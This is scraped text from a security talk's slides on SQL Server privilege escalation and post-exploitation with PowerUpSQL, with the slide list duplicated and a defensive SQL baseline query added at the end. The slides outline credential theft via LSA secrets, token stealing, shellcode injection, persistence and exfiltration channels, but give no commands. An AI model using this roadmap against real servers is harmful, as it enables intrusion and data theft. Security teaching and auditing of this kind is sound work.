Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation Overview: Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry and file auto-runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
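An added baseline query, not code from the deck or from PowerUpSQL, that enumerates the four SQL Server-layer persistence points listed under item 1 (startup procedures, triggers, agent jobs, modified code) so they can be compared against a known-good baseline; it assumes sysadmin access and a 30-day lookback window.

```sql
-- Added baseline query for the SQL Server-layer persistence points on the slide;
-- not code from the PowerUpSQL deck or project. Assumes sysadmin access and a
-- 30-day lookback window (an assumption; adjust to the environment).

-- 1. Startup procedures: run under the service account each time the engine starts.
SELECT name, create_date, modify_date
FROM master.sys.procedures
WHERE is_auto_executed = 1;

-- 2. Server-scoped triggers, including logon triggers that fire on every connection.
SELECT name, type_desc, is_disabled, create_date, modify_date
FROM sys.server_triggers;

-- 3. Agent jobs and their steps; CmdExec and PowerShell subsystems run outside T-SQL.
SELECT j.name AS job_name,
       SUSER_SNAME(j.owner_sid) AS owner_name,
       j.enabled,
       s.step_id, s.subsystem, s.command,
       j.date_modified
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
ORDER BY j.date_modified DESC;

-- 4. Modified code in the current database: procedures, functions, and DML triggers
--    changed inside the window. Repeat per user database (for example via USE <db>).
SELECT name, type_desc, modify_date
FROM sys.objects
WHERE type IN ('P', 'FN', 'IF', 'TF', 'TR')
  AND modify_date >= DATEADD(DAY, -30, SYSDATETIME())
ORDER BY modify_date DESC;
```

Any startup procedure, logon trigger, or job step that is not in the baseline is worth reading in full, since each runs with the privileges the deck describes.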